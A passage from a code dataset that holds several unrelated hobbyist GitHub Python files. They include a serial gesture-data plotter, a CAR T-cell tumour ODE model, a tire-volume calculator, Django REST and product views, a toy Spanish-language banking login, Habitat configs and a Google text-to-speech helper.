[[],[],[],[]]\nzz = [[],[],[],[]]\nnum = 0\nflag = 1\nflagWriteData = 0\ngestureTypeStr =''\nnameStr =''\nbakNameStr=''\nserial_result = []\nactflag1 = 0\nactflag2 = 1\nactflag3 = 300\nser = serial.Serial( \n port = 'com11',\n baudrate=115200,\n)\n\n\n\ncnum = []\n\nisOpened = threading.Event()\n\n#----------------------------------------------------------------------\ndef drawPic(): \n#获取GUI界面上的参数\n global ch,z,actflag1,c1,c2,c3,c4,z1,z2,actflag2,actflag3,zz,mean0,mean1,mean2,mean3\n\n z= np.array(z)\n ch=np.array(ch)\n lens = len(ch[1])\n z = np.hstack((z[:,lens:],ch))\n b,a = signal.butter(3,0.15,'low') \n z2 = signal.filtfilt(b,a,z) \n #清空图像,以使得前后两次绘制的图像不会重叠\n drawPic.f.clf()\n drawPic.a=drawPic.f.add_subplot(111) \n drawPic.a.plot(z2[0],'b')\n drawPic.a.plot(z2[1],'r')\n drawPic.a.plot(z2[2],'g')\n drawPic.a.plot(z2[3],'y')\n drawPic.a.set_title('Demo: Draw N Random Dot')\n drawPic.canvas.show()\n \n\ndef clear():\n global cnum,num\n cnum = []\n num = 0\n\ndef COMT():\n\n global num,flag,f,data\n print(\"trying connect to the serial^^^\")\n while 1:\n n = ser.inWaiting()\n tmpN=n\n if n:\n #print n\n data = ''\n while n:\n data += str(binascii.b2a_hex(ser.read(1))) # [2:-1]\n# data += ' '\n n = n - 1\n# print data\n if data != '':\n if flagWriteData == 1:\n f.write(data)\n num = num + tmpN\n# print num\n\n\ndef DISPLAY(): #使用标志位来判定是否\n\n global data,ch\n data1 = ''\n\n flag = 0\n while 1:\n if data != '':\n if data != data1:\n if flag == 0:\n if len(data) < 20:\n flag =1\n if flag == 1:\n if len(data) > 120:\n ch = [[],[],[],[]]\n lens = int(len(data)/16) - 1\n for i in range(16):\n if((data[i]=='0')&(data[i+4]=='1')&(data[i+8]=='2')&(data[i+12]=='3')):\n break\n flag =0\n datas = data[i:i+16*lens]\n for j in range(lens):\n for chnum in range(4):\n amplitude = int(datas[j*16+chnum*4+1],16)*256+int(datas[j*16+chnum*4+2],16)*16+int(datas[j*16+chnum*4+3],16)\n ch[chnum].append(amplitude)\n drawPic()\n data1 = data\n\n#config函数就是通过设置组件的参数来改变组件的,这里改变的是font字体大小\ntop=Tk() #主窗口\ntop.geometry('600x400') #设置了主窗口的初始大小600x400\nframe = Frame(top)\nu = StringVar()\ntop.title('Ubicom 手势数据采集 ')\nnameLabel=Label(top,text='姓名:')\nnameLabel.grid(row=0,sticky=E)\nnameEntry=Entry(top)\nnameEntry.grid(row=0,column=1)\nnameEntry.insert(0,'zyf')\ngestureTypeLabel=Label(top,text='手势类别:')\ngestureTypeLabel.grid(row=1,column=0,sticky=E)\nresultTypeLabel=Label(top,text='result:')\nresultTypeLabel.grid(row=5,column=0,sticky=E)\nresultTypeEntry=Entry(top)\nresultTypeEntry.grid(row=5,column=1)\nresultTypeEntry.insert(0,'???')\ngestureTypeEntry=Entry(top)\ngestureTypeEntry.grid(row=1,column=1)\ngestureTypeEntry.insert(0,'1')\ncountLabel=Label(top,text='请输入采集者姓名和手势号')\ncountLabel.grid(row=0,column=2,columnspan=4,rowspan=2, sticky=E, padx=5, pady=5)\n\nstartSaveStr=StringVar()\nstartSaveButton=Button(top,textvariable=startSaveStr, width=15,command = startSaveCB)\nstartSaveButton.grid(row=2,column=2,rowspan=2)\nstartSaveStr.set('Start')\n\n#在Tk的GUI上放置一个画布,并用.grid()来调整布局\ndrawPic.f = Figure(figsize=(5,4), dpi=100) \ndrawPic.canvas = FigureCanvasTkAgg(drawPic.f, master=top)\ndrawPic.canvas.show()\ndrawPic.canvas.get_tk_widget().grid(row=11, columnspan=3) \n\ncom_thread = threading.Thread(target=COMT)\ncom_thread.setDaemon(True)\ncom_thread.start()\n\n\ndisplay_thread = threading.Thread(target=DISPLAY)\ndisplay_thread.setDaemon(True)\ndisplay_thread.start()\nmainloop()\n","repo_name":"zyf001/wristmouse_code","sub_path":"serial_show.py","file_name":"serial_show.py","file_ext":"py","file_size_in_byte":5227,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"17710148599","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Mar 11 10:47:10 2022\r\n\r\n@author: cdmeh\r\n\"\"\"\r\n\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Feb 18 16:44:22 2022\r\n\r\n@author: cdmeh\r\n\"\"\"\r\n\r\n# Imports necessary modules\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport scipy.integrate as scint\r\n\r\n# Plots a series of comparison curves between CARRGO and\r\n# the new Bertanlaffy model.\r\ndef main():\r\n \r\n x1,y1,z1,m1,n1 = NEWGO([0,0,0],[0.5,0,0,0.5,0])\r\n x2,y2,z2,m2,n2 = NEWGO([0,0,0],[0.5,0.5,0,0.5,0])\r\n x3,y3,z3,m3,n3 = NEWGO([0.25,0.25,0.25],[0.5,0.5,0,0.5,0])\r\n t = np.linspace(0,40,len(x1))\r\n label1 = [\"New Model: No Dose\",\"New Model: One Dose\",\"New Model: Four Doses\"]\r\n plt.figure(1)\r\n plt.grid(True)\r\n plt.title(\"Possible Dynamics of Glioma/CAR T-Cell Interaction\")\r\n plt.ylabel(\"Cancer Cell Count\")\r\n plt.xlabel(\"Time Elapsed\")\r\n plt.plot(t,x1, label = label1[0])\r\n plt.plot(np.linspace(0,40,len(x2)),x2, label = label1[1])\r\n plt.plot(np.linspace(0,40,len(x3)),x3, label = label1[2])\r\n plt.legend()\r\n plt.show()\r\n plt.close(fig = 1)\r\n plt.figure(2)\r\n plt.grid(True)\r\n plt.title(\"Possible Dynamics of Glioma/CAR T-Cell Interaction\")\r\n plt.ylabel(\"CAR T-Cell Count\")\r\n plt.xlabel(\"Time Elapsed\")\r\n plt.plot(t,y1, label = label1[0])\r\n plt.plot(np.linspace(0,40,len(y2)),y2, label = label1[1])\r\n plt.plot(np.linspace(0,40,len(y3)),y3, label = label1[2])\r\n plt.legend()\r\n plt.show()\r\n plt.close(fig = 2)\r\n plt.figure(3)\r\n plt.grid(True)\r\n plt.title(\"Possible Dynamics of Glioma/CAR T-Cell Interaction\")\r\n plt.ylabel(\"Memory T-Cell Count\")\r\n plt.xlabel(\"Time Elapsed\")\r\n plt.plot(t,z1, label = label1[0])\r\n plt.plot(np.linspace(0,40,len(z2)),x2, label = label1[1])\r\n plt.plot(np.linspace(0,40,len(z3)),x3, label = label1[2])\r\n plt.legend()\r\n plt.show()\r\n plt.close(fig = 3)\r\n plt.figure(4)\r\n plt.grid(True)\r\n plt.title(\"Possible Dynamics of Glioma/CAR T-Cell Interaction\")\r\n plt.ylabel(\"Non-Tumor Associated Macrophage Cell Count\")\r\n plt.xlabel(\"Time Elapsed\")\r\n plt.plot(t,m1, label = label1[0])\r\n plt.plot(np.linspace(0,40,len(m2)),m2, label = label1[1])\r\n plt.plot(np.linspace(0,40,len(m3)),m3, label = label1[2])\r\n plt.legend()\r\n plt.show()\r\n plt.close(fig = 4)\r\n plt.figure(5)\r\n plt.grid(True)\r\n plt.title(\"Possible Dynamics of Glioma/CAR T-Cell Interaction\")\r\n plt.ylabel(\"Tumor Associated Macrophage Cell Count\")\r\n plt.xlabel(\"Time Elapsed\")\r\n plt.plot(t,n1, label = label1[0])\r\n plt.plot(np.linspace(0,40,len(n2)),n2, label = label1[1])\r\n plt.plot(np.linspace(0,40,len(n3)),n3, label = label1[2])\r\n plt.legend()\r\n plt.show()\r\n plt.close(fig = 5)\r\n \r\n \r\n \r\n\r\ndef NEWGO(DOSE,z0):\r\n # Parameters of the simulation\r\n # Final Time\r\n tf = 40\r\n # Number of steps\r\n n = 1000\r\n tspan = (0,tf)\r\n # System parameters\r\n P = (1.87,1.6,1,1,1,1,1,1,1,1,2,3,2)\r\n \r\n \r\n sol1 = scint.solve_ivp(dw,(0,tf//4),z0, args = P,max_step = tspan[-1]/n)\r\n z1 = [sol1.y[0][-1],sol1.y[1][-1]+DOSE[0],sol1.y[2][-1],sol1.y[3][-1],sol1.y[4][-1]]\r\n sol2 = scint.solve_ivp(dw,(0,tf//4),z1, args = P,max_step = tspan[-1]/n)\r\n z2 = [sol2.y[0][-1],sol2.y[1][-1]+DOSE[1],sol2.y[2][-1],sol2.y[3][-1],sol2.y[4][-1]]\r\n sol3 = scint.solve_ivp(dw,(0,tf//4),z2, args = P,max_step = tspan[-1]/n)\r\n z3 = [sol3.y[0][-1],sol3.y[1][-1]+DOSE[2],sol3.y[2][-1],sol3.y[3][-1],sol3.y[4][-1]]\r\n sol4= scint.solve_ivp(dw,(0,tf//4),z3, args = P,max_step = tspan[-1]/n)\r\n sx = np.hstack((sol1.y[0],sol2.y[0],sol3.y[0],sol4.y[0]))\r\n sy = np.hstack((sol1.y[1],sol2.y[1],sol3.y[1],sol4.y[1]))\r\n sz = np.hstack((sol1.y[2],sol2.y[2],sol3.y[2],sol4.y[2]))\r\n sm = np.hstack((sol1.y[3],sol2.y[3],sol3.y[3],sol4.y[3]))\r\n sn = np.hstack((sol1.y[4],sol2.y[4],sol3.y[4],sol4.y[4]))\r\n # Plots trajectories and boundary between regions of concavity\r\n \r\n return sx,sy,sz,sm,sn\r\ndef dw(t,z,A,B,C,D,E,G,H,I,J,K,L,M,N):\r\n F = np.power(A/B,1/3)\r\n dx = A*np.power(z[0],2/3) - B*z[0] - (C+D*z[3])*z[1]*np.power(z[0],2/3)\r\n dy = -1*E*(1 - np.power(z[0],2/3)/F)*z[1] + G*z[2]*np.power(z[0],2/3) + H*z[1]*np.power(z[0],2/3) - I*z[1]\r\n dz = E*(1 - np.power(z[0],2/3)/F)*z[1] - G*z[2]*np.power(z[0],2/3) - J*z[2]\r\n dm = (L - K)*z[3]*np.power(z[0],2/3) + M*z[3]*z[4] - N*z[3]\r\n dn = K*z[3]*np.power(z[0],2/3) - M*z[3]*z[4] - N*z[4]\r\n return [dx,dy,dz,dm,dn]\r\n\r\n# Executes function\r\nmain()","repo_name":"CMeherg/CARRGO","sub_path":"meherg_CARR_3-11-2022.py","file_name":"meherg_CARR_3-11-2022.py","file_ext":"py","file_size_in_byte":4505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21980442901","text":"import math\nfrom datetime import datetime\n\nwidth = float( input( \"Enter the width of the tire in mm (ex 205): \" ) )\nratio = float( input( \"Enter the aspect ratio of the tire (ex 60): \" ) )\ndiameter = float( input( \"Enter the diameter of the wheel in inches (ex 15): \" ) )\n\nvolume = ((math.pi * (width ** 2.0) * ratio) * ((width * ratio) + (2540.0 * diameter)))/(10000000.0)\nounces = volume / 29.574\n\nprint(f\"The approximate volume is {volume:.1f} milliliters ({ounces:.1f} ounces)\")\n\npurchase = input(\"Would you like to purchase tires with these dimensions(Yes or No)? \")\n\nif purchase.lower() == \"yes\":\n phone = input(\"Please enter your phone number so we can help complete your purchase: \")\n\n current = str(datetime.now())\n split = current.split(\" \", 1)\n date = split[0]\n\n with open(\"volumes.txt\", \"at\") as volumes_file:\n\n # Print a car's model and dimensions to the file.\n print(f\"{date}, {int(width)}, {int(ratio)}, {int(diameter)}, {volume:.1f}, {phone}\", file=volumes_file)\n\nelif purchase.lower() == \"no\":\n current = str(datetime.now())\n split = current.split(\" \", 1)\n date = split[0]\n\n with open(\"volumes.txt\", \"at\") as volumes_file:\n\n # Print a car's model and dimensions to the file.\n print(f\"{date}, {int(width)}, {int(ratio)}, {int(diameter)}, {volume:.1f}\", file=volumes_file)","repo_name":"EmeraldE11/ProgrammingWithFunctions","sub_path":"tire_volume.py","file_name":"tire_volume.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7504135171","text":"from django.db.models.query import QuerySet\nfrom django.shortcuts import get_object_or_404, render\nfrom rest_framework.decorators import permission_classes\nfrom rest_framework.response import Response\nfrom rest_framework import filters, viewsets\nfrom rest_framework import permissions\nfrom rest_framework import status\nfrom rest_framework.parsers import MultiPartParser, FormParser\nfrom .models import Bid, Category, Listing, Comment, UserUploadedImage, Watching\nfrom .serializers import BidSerializer, CategorySerializer, ListingSerializer, CommentSerializer, WatchingSerializer, UserUploadedImageSerializer\nfrom .permissions import IsOwnerOrReadOnly, IsOwner\nfrom .custom_helpers import get_object_or_None\nfrom users.models import User\nfrom rest_framework import status\nfrom commerce_rest.settings import MEDIA_ROOT\nimport django_filters.rest_framework\n# Create your views here.\n\n\nclass ListingViewSet(viewsets.ModelViewSet):\n queryset = Listing.objects.order_by('-creation_date')\n search_fields = ['title', 'description', 'category__name']\n # filter_backends = (filters.SearchFilter,)\n filter_backends = [filters.SearchFilter,\n django_filters.rest_framework.DjangoFilterBackend]\n filterset_fields = ['category', 'is_active']\n serializer_class = ListingSerializer\n parser_classes = (MultiPartParser, FormParser)\n permission_classes = [\n permissions.IsAuthenticatedOrReadOnly, IsOwnerOrReadOnly]\n\n def perform_create(self, serializer):\n serializer.save(creator=self.request.user)\n\n # Debug Perform_create only\n # def perform_create(self, serializer):\n # serializer.save(creator=User.objects.get(pk=1))\n\n\nclass CommentViewSet(viewsets.ModelViewSet):\n queryset = Comment.objects.all()\n serializer_class = CommentSerializer\n permission_classes = [\n permissions.IsAuthenticatedOrReadOnly, IsOwnerOrReadOnly]\n\n def perform_create(self, serializer):\n serializer.save(author=self.request.user)\n\n\n# TODO add an admin or read only class\nclass CategoryViewSet(viewsets.ModelViewSet):\n queryset = Category.objects.order_by('name')\n serializer_class = CategorySerializer\n permission_classes = [permissions.DjangoModelPermissionsOrAnonReadOnly]\n pagination_class = None\n\n\nclass BidViewSet(viewsets.ModelViewSet):\n queryset = Bid.objects.all()\n serializer_class = BidSerializer\n permission_classes = [\n permissions.IsAuthenticatedOrReadOnly, IsOwnerOrReadOnly]\n\n def perform_create(self, serializer):\n serializer.save(creator=self.request.user)\n\n\nclass UserImagesViewSet(viewsets.ModelViewSet):\n queryset = UserUploadedImage.objects.all()\n serializer_class = UserUploadedImageSerializer\n permission_classes = [\n permissions.IsAuthenticatedOrReadOnly, IsOwnerOrReadOnly]\n permission_classes = [\n permissions.AllowAny]\n\n def perform_create(self, serializer):\n serializer.save(creator=self.request.user)\n\n\nclass WatchingViewSet(viewsets.ModelViewSet):\n queryset = Watching.objects.all()\n serializer_class = WatchingSerializer\n permission_classes = [permissions.IsAuthenticatedOrReadOnly]\n\n def create(self, request):\n user = request.user\n try:\n listing = Listing(id=request.data['listing_id'])\n instance = Watching(user_id=user, listing_id=listing)\n except Exception:\n return Response({\"message\": \"Something went wrong. Check that user and listing exist\"}, status=status.HTTP_400_BAD_REQUEST)\n\n watching_listing = get_object_or_None(\n Watching.objects.all(), user_id=request.user.id, listing_id=request.data['listing_id'])\n if watching_listing is None:\n serializer = WatchingSerializer(\n instance=instance, data=request.data)\n if serializer.is_valid():\n watching_saved = serializer.save()\n return Response({\"message\": f\"{watching_saved.listing_id.id} added to watch list\"}, status=status.HTTP_201_CREATED)\n return Response({\"message\": \"Something went wrong\"}, status=status.HTTP_400_BAD_REQUEST)\n\n # TODO refactor into destroy()\n watching_listing.delete()\n\n return Response({\"message\": f\"{watching_listing.listing_id} removed from watch list\"}, status=status.HTTP_200_OK)\n\n # def destroy(self, request):\n # user_id = request.user.id\n # print(request.user)\n # # listing = Listing(id=request.data['listing_id'])\n # watching_listing = get_object_or_None(\n # Watching.objects.all(), user_id=user_id, listing_id=request.data['listing_id'])\n\n # if watching_listing is None:\n # return Response({\"message\": f\"User is already not currently watching {watching_listing.listing_id}\"}, status=status.HTTP_400_BAD_REQUEST)\n\n # watching_listing.delete()\n # return Response({\"message\": f\"{watching_listing.listing_id} removed from watch list\"}, status=status.HTTP_200_OK)\n","repo_name":"IB21-A/ebid","sub_path":"commerce/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22829737673","text":"class Usuario:\r\n def __init__(self):\r\n self.nombre=[]\r\n self.cedula=[]\r\n self.numero=[]\r\n self.clave=[]\r\n print( ''' \r\n SOMOS NEQUI COLOMBIA \r\n ¡¡BIENVENIDO!!\r\n para comenzar a disfrutar de nequi \r\n debes registrarte''')\r\n def crearUsuario(self):\r\n self.opcionUsuario = int(input('''\r\n ------------------------------------------\r\n POR FAVOR introduce los siguientes datos en su respectivo orden.. \r\n 1. Mi nombre\r\n 2. Mi cedula\r\n 3. Mi numero telefonico\r\n 4. Mi clave\r\n 5. Ver mi usuario \r\n 6. terminar registro\r\n ingresar: '''))\r\n while True:\r\n if self.opcionUsuario==1:\r\n self.nombreDef()\r\n elif self.opcionUsuario==2:\r\n self.cedulaDef()\r\n elif self.opcionUsuario==3:\r\n self.telefonoDef()\r\n elif self.opcionUsuario==4:\r\n self.claveDef()\r\n elif self.opcionUsuario==5:\r\n self.mostrarUsuario()\r\n elif self.opcionUsuario>=6:\r\n break\r\n else:\r\n print('LO SENTIMOS OPCION NO VALIDA!, INTENTE DE NUEVO.. ')\r\n self.crearUsuario()\r\n\r\n def nombreDef(self):\r\n self.nombre.append(input(\"ingrese su nombre: \"))\r\n self.nnombre=self.nombre\r\n print(self.nombre)\r\n print('''continue con su proceso de registro\r\n por favor introduce tu cedula: ''')\r\n self.crearUsuario()\r\n\r\n def cedulaDef(self):\r\n self.cedula.append(int(input(\"introduce tu numero de cedula: \")))\r\n self.ccedula=self.cedula\r\n print(self.nombre)\r\n print('''continue con su proceso de registro\r\n por favor introduce tu contacto: ''')\r\n self.crearUsuario()\r\n \r\n def telefonoDef(self):\r\n self.numero.append(int(input(\"por favor introduce tu numero de contacto: \")))\r\n self.nnumero=self.numero\r\n print(self.nombre)\r\n print('''continue con su proceso de registro\r\n por favor introduce tu clave de usuario:''')\r\n self.crearUsuario()\r\n\r\n def claveDef(self):\r\n self.clave.append(int(input(\"introduce una clave para tu usuario: \")))\r\n self.cclave=self.clave\r\n self.crearUsuario()\r\n \r\n def mostrarUsuario (self):\r\n print(\"\\tsu nombre de usuario es: \",self.nnombre)\r\n print(\"\\tsu cedula es: \",self.ccedula)\r\n print(\"\\tsu telefono de contacto: \",self.nnumero)\r\n print(\"\\tsu clave de usuario es: \",self.cclave)\r\n print('=======================================')\r\n print('GRACIAS POR USAR NUESTROS SERVICIOS!')\r\n print('=======================================')\r\n self.crearUsuario()\r\n\r\n\r\nclass login(Usuario):\r\n def inter(self):\r\n print('''\r\n BIENVENIDO\r\n ''')\r\n self.xxnombre=self.nombre.index(str(input(\"ingrese su usuario: \")))\r\n self.xnombre=self.nombre[self.xxnombre] \r\n print (self.xnombre)\r\n \r\n\r\n self.xxclave=self.clave.index(int(input(\"ingrese su contraseña\")))\r\n self.xxclave=self.clave[self.xxclave] \r\n print (self.xnombre)\r\n if self.xxclave==self.xxclave:\r\n print('''\r\n BIENVENIDO\r\n \r\n ya puedes disfrutar de nequi colombia''')\r\n else:\r\n print(\"intente de nuevo\")\r\n self.inter()\r\nclass Cajero(login):\r\n monto=0\r\n def operaciones(self):\r\n self.opcion = int(input('''\r\n ------------------------------------------\r\n POR FAVOR INDIQUE QUE OPERACION DESEA REALIZAR.. \r\n 1. VER SALDO\r\n 2. DEPOSITO A CUENTA\r\n 3. RETIRO DE EFECTIVO\r\n 4. SALIR\r\n 5. MOSTRAR_USUARIO\r\n ingresar: '''))\r\n self.control=0\r\n while self.control==0:\r\n if self.opcion==1:\r\n self.saldo()\r\n elif self.opcion==2:\r\n self.depositar()\r\n elif self.opcion==3:\r\n self.retirar()\r\n elif self.opcion==4:\r\n self.control=1\r\n self.salir()\r\n else:\r\n print('LO SENTIMOS OPCION NO VALIDA!, INTENTE DE NUEVO.. ')\r\n self.operaciones()\r\n\r\n def saldo(self):\r\n print('SU saldo DISPONIBLE ES: ', self.monto)\r\n print('DESEA REALIZAR OTRA OPERACION?')\r\n self.operaciones()\r\n\r\n def depositar(self):\r\n self.deposito = int(input('INDIQUE LA CANTIDAD A DEPOSITAR.. '))\r\n self.monto=self.monto + self.deposito\r\n self.saldo()\r\n\r\n def retirar(self):\r\n self.retiro = int(input('INDIQUE LA CANTIDAD A RETIRAR.. '))\r\n self.control = 0\r\n while self.control==0:\r\n if self.retiro > self.monto:\r\n print('''NO HAY FONDOS SUFICIENTES!!!..\r\n --------------------------------------------''')\r\n self.retiro = int(input('INDIQUE LA CANTIDAD A RETIRAR.. '))\r\n elif self.retiro<= self.monto:\r\n self.monto=self.monto-self.retiro\r\n self.control=1\r\n print('CANTIDAD RETIRADA: ', self.retiro)\r\n self.saldo()\r\n \r\n\r\n def salir(self):\r\n print('=======================================')\r\n print('GRACIAS POR USAR NUESTROS SERVICIOS!')\r\n print('=======================================')\r\n\r\n\r\nejecucion = Cajero()\r\nejecucion.crearUsuario()\r\nejecucion.inter()\r\nejecucion.operaciones()\r\n","repo_name":"DRAKOrar/mini-nequi","sub_path":"login10.py","file_name":"login10.py","file_ext":"py","file_size_in_byte":5620,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72920827308","text":"import bottle\n\n\n@bottle.route('/')\ndef home_page():\n my_things = ['apple', 'orange', 'banana', 'peach']\n return bottle.template('hello_world', {'username': 'Pahko',\n 'things': my_things})\n\n\nbottle.debug(True)\nbottle.run(host='localhost', port=8080)\n","repo_name":"online-courses/M101P-MongoDB-for-Developers","sub_path":"week-1-4-Bottle-Framework--Using-Views/hello_world.py","file_name":"hello_world.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"721491099","text":"# Habitat configs\n# This should be sourced by the evaluate script,\n# which must save a sacred experiment in the variable \"ex\"\nfrom evkit.utils.misc import remove_whitespace\nimport os\n\n@ex.config\ndef cfg_base():\n cfg = {}\n uuid = \"\"\n config_file = os.path.join(os.getcwd(), 'habitat-api/configs/tasks/pointnav_gibson_val.yaml')\n cfg['eval_kwargs'] = {\n 'exp_path': '/mnt/logdir/keypoints3d_encoding_restart1',\n 'weights_only_path': None,\n 'challenge': True, # True for challenge.submit() False for benchmark.evaluate()\n 'debug': False, # forces visdom and logs videos\n 'overwrite_configs': True, # for experiments that are not up to date with latest configs, upload this run's cfg into the experiments\n 'benchmark_episodes': 10, # up to 994\n 'benchmark_config': config_file,\n }\n\n@ex.named_config\ndef weights_only():\n cfg = {}\n cfg['eval_kwargs'] = {\n 'exp_path': None,\n 'weights_only_path': '/mnt/eval_runs/curvature_encoding_moresteps_collate5/checkpoints/weights_and_more-latest.dat',\n }\n\n\n@ex.named_config\ndef cfg_overwrite():\n cfg = {}\n uuid = \"_overwrite\"\n cfg['learner'] = {\n 'taskonomy_encoder': '/mnt/models/keypoints3d_encoder.dat', # 'None' for random projection, 'pixels_as_state' for pixels as state\n 'perception_network': 'features_only',\n 'encoder_type': 'taskonomy', # 'taskonomy' for regular encoder or 'atari' for student nets\n 'backout': {\n 'use_backout': True,\n 'patience': 80,\n 'unstuck_dist': 0.3,\n 'randomize_actions': True,\n 'backout_type': 'hardcoded', # hardcoded, trained\n 'backout_ckpt_path': '/mnt/logdir/curvature_encoding_moresteps_collate/checkpoints/ckpt-latest.dat', # note this one is ckpt path since we do not need configs\n 'num_takeover_steps': 8,\n },\n 'validator': {\n 'use_validator': True,\n 'validator_type': 'jerk'\n }\n }\n image_dim = 84\n cfg['env'] = {\n 'sensors': {\n 'features': None,\n 'taskonomy': None,\n 'map': None,\n 'target': None,\n 'global_pos': None,\n },\n 'collate_env_obs': False,\n 'env_gpus': [0],\n 'transform_fn': \"TransformFactory.independent({{'taskonomy':taskonomy_features_transform('{taskonomy_encoder}', encoder_type='{encoder_type}'), 'map':image_to_input_pool((3,{image_dim},{image_dim})), 'target':identity_transform(), 'global_pos':identity_transform()}}, keep_unnamed=False)\".format(encoder_type=cfg['learner']['encoder_type'], taskonomy_encoder=cfg['learner']['taskonomy_encoder'], image_dim=image_dim),\n 'use_target': True,\n 'use_map': True,\n 'habitat_map_kwargs': {\n 'map_building_size': 22, # in meters\n 'map_max_pool': False,\n 'use_cuda': False,\n 'history_size': None,\n },\n 'env_specific_kwargs': {\n 'target_dim': 16, # Taskonomy reps: 16, scratch: 9, map_only: 1\n },\n 'transform_fn_pre_aggregation': \"\"\"\n TransformFactory.independent(\n {\n 'taskonomy':rescale_centercrop_resize((3,256,256)),\n },\n keep_unnamed=True)\n \"\"\".translate(remove_whitespace),\n 'transform_fn_post_aggregation': \"\"\"\n TransformFactory.independent(\n {{\n 'taskonomy':taskonomy_features_transform('{taskonomy_encoder}'),\n 'target':identity_transform(),\n 'map':map_pool_collated((3,84,84)),\n 'global_pos':identity_transform(),\n }},\n keep_unnamed=False)\n \"\"\".translate(remove_whitespace).format(\n taskonomy_encoder='/mnt/models/normal_encoder.dat'),\n }\n cfg['training'] = {\n 'seed': 42\n }\n del image_dim\n\n","repo_name":"alexsax/midlevel-reps","sub_path":"configs/habitat_eval.py","file_name":"habitat_eval.py","file_ext":"py","file_size_in_byte":3966,"program_lang":"python","lang":"en","doc_type":"code","stars":103,"dataset":"github-code","pt":"37"} +{"seq_id":"37426721330","text":"'''\n@file : readData.py\n@time : Mar 17,2016 16:24\n@author : duanxxnj@163.com\n'''\n\nimport cv2\n\nimport numpy as np\nimport pandas as pd\n\nimg = pd.read_csv('test.csv')\n\np1 = img.values[10]\npix = []\n\nfor i in range(28):\n pix.append([])\n for j in range(28):\n pix[i].append(p1[i*28 + j])\n\nnppix = np.array(pix)\n\ncv2.imshow(\"image\", np.array(pix))\ncv2.waitKey()","repo_name":"Duanxx/MachineLearningProjects","sub_path":"DigitRecognizer/readData.py","file_name":"readData.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10822629560","text":"#!/usr/bin/python\nimport os\nimport os.path\nimport string\nimport urllib2\nfrom threads.TInterpreterPlaySound import TInterpreterPlaySound\n\n\ndef __internetOn():\n try:\n urllib2.urlopen('http://www.google.com',timeout=1) \n return True\n except urllib2.URLError as err:\n pass\n return False\n\ndef intentar(projectName, texto):\n texto = texto.split(\" \")\n texto = string.join(texto, \"+\")\n\n destino = os.path.join(\"proyectos\", projectName, texto + \".mp3\")\n if os.path.exists(destino): #ya lo tengo, lo reproduzco\n t = TInterpreterPlaySound([destino, ])\n t.start()\n return True\n else: #no lo tengo\n if __internetOn(): #hay internet\n os.system(\"wget -q -U Mozilla -O \\\"\" + destino + \"\\\" \\\"http://translate.google.com/translate_tts?ie=UTF-8&tl=es&q=\" + texto + \"\\\"\")\n t = TInterpreterPlaySound([destino, ])\n t.start()\n return True\n else: #no hay internet y no lo tengo\n return False\n","repo_name":"sugar-activities/4660-activity","sub_path":"speak/GoogleTTS.py","file_name":"GoogleTTS.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42764219392","text":"from django.shortcuts import render\r\nfrom .models import Product, Category, ProductImages\r\nfrom django.db.models import Q\r\nfrom django.http import Http404\r\nimport random\r\n# Create your views here.\r\n\r\ndef productsList(request):\r\n try:\r\n products = Product.objects.all()\r\n #category = Category.objects.all()\r\n #categorylol = Category.objects.filter(title__in=['clothing', 'skate', 'shoes'])\r\n category = Category.objects.filter(parent__exact=None)\r\n category_list = list(category)\r\n sub_category = Category.objects.filter(parent__in=category_list)\r\n #print(sub_category)\r\n except:\r\n #products = None\r\n raise Http404\r\n template = 'products/products.html'\r\n context = {\r\n 'products': products,\r\n 'category': category,\r\n 'sub_category': sub_category,\r\n }\r\n return render(request, template, context)\r\n # mainCategory = Category.objects.select_related().filter(title = cat)\r\n # allCategories = Category.objects.all()\r\n # products = Product.objects.all()\r\n # template = 'products/products.html'\r\n # context = {\r\n # 'mainCategory': mainCategory,\r\n # 'allCategories': allCategories,\r\n # 'products': products,\r\n # }\r\n # return render(request, template, context)\r\n # except cat.DoesNotExists:\r\n # return productDetail(request, cat)\r\n\r\ndef productsSale(request):\r\n try:\r\n products = Product.objects.all()\r\n #category = Category.objects.all()\r\n #categorylol = Category.objects.filter(title__in=['clothing', 'skate', 'shoes'])\r\n category = Category.objects.filter(parent__exact=None)\r\n category_list = list(category)\r\n sub_category = Category.objects.filter(parent__in=category_list)\r\n #print(sub_category)\r\n except:\r\n #products = None\r\n raise Http404\r\n template = 'products/sale.html'\r\n context = {\r\n 'products': products,\r\n 'category': category,\r\n 'sub_category': sub_category,\r\n }\r\n return render(request, template, context)\r\n\r\ndef category(request, cat):\r\n #print(subCategories)\r\n try:\r\n #products = Category.objects.select_related().get(title=cat)\r\n #products = Category.objects.select_related().get(title=cat).product_set.all()\r\n products = Product.objects.filter(category__parent__title=cat)\r\n subCategories = Category.objects.get(title=cat).category_set.all()\r\n except:\r\n #products = None\r\n #subCategories = None\r\n raise Http404\r\n template = 'products/category.html'\r\n context = {\r\n 'products': products,\r\n 'category': cat,\r\n 'subCategories': subCategories\r\n }\r\n #print(products)\r\n return render(request, template, context)\r\n\r\ndef subCategory(request, cat, subcat):\r\n try:\r\n products = Product.objects.filter(category__title=subcat)\r\n subCategories = Category.objects.get(title=cat).category_set.all()\r\n #check = Category.objects.filter(title=subcat)\r\n if not Category.objects.filter(title=subcat).exists():\r\n raise Http404\r\n except:\r\n #products = None\r\n #subCategories = None\r\n raise Http404\r\n template = 'products/category.html'\r\n context = {\r\n 'products': products,\r\n 